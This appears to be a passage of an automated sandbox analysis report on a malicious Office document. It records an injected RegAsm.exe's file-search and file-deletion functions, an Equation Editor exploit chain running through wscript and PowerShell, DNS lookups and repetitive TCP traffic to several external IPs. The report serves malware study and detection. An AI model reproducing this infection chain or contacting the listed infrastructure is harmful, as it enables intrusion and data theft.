                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,13_2_0040BD72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,13_2_100010F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_10006580 FindFirstFileExA,13_2_10006580
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0040AE51 FindFirstFileW,FindNextFileW,15_2_0040AE51
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 16_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,16_2_00407EF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 17_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,17_2_00407898
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,13_2_00407CD2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\

                Software Vulnerabilities

                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                Source: C:\Windows\SysWOW64\wscript.exe Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Source: global traffic DNS query: name: og1.in
                Source: global traffic DNS query: name: raw.githubusercontent.com
                Source: global traffic DNS query: name: geoplugin.net
                Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.67.216.244:443
                Source: global traffic TCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global traffic TCP traffic: 192.168.2.22:49167 -> 104.168.7.8:80
                Source: global traffic TCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global traffic TCP traffic: 192.168.2.22:49171 -> 104.168.7.8:80
                Source: global traffic TCP traffic: 192.168.2.22:49174 -> 178.237.33.50:80
                Source: global traffic TCP traffic: 192.168.2.22:49161 -> 172.67.216.244:443
                Source: global traffic TCP traffic: 192.168.2.22:49162 -> 172.67.216.244:443
                Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                Source: global traffic TCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
Source: global traffic, TCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443 (98 packets, all client-to-server; no reply packets from 185.199.111.133:443 recorded on this connection)
Source: global traffic, TCP traffic: 192.168.2.22:49161 <-> 172.67.216.244:443 (21 packets, both directions)
Source: global traffic, TCP traffic: 192.168.2.22:49162 <-> 172.67.216.244:443 (17 packets, both directions)
Source: global traffic, TCP traffic: 192.168.2.22:49163 <-> 172.67.216.244:443 (17 packets, both directions)
Source: global traffic, TCP traffic: 192.168.2.22:49166 <-> 172.67.216.244:443 (17 packets, both directions)
Source: global traffic, TCP traffic: 192.168.2.22:49167 <-> 104.168.7.8:80 (118 packets, both directions; 114 listed before the 49168 connection and 4 more after it)
Source: global traffic, TCP traffic: 192.168.2.22:49168 <-> 172.67.216.244:443 (19 packets, both directions)
Source: global traffic, TCP traffic: 192.168.2.22:49169 <-> 104.168.7.8:80 (94 packets, both directions)
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
                Source: global trafficTCP traffic: 104.168.7.8:80 -> 192.168.2.22:49169
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.168.7.8:80
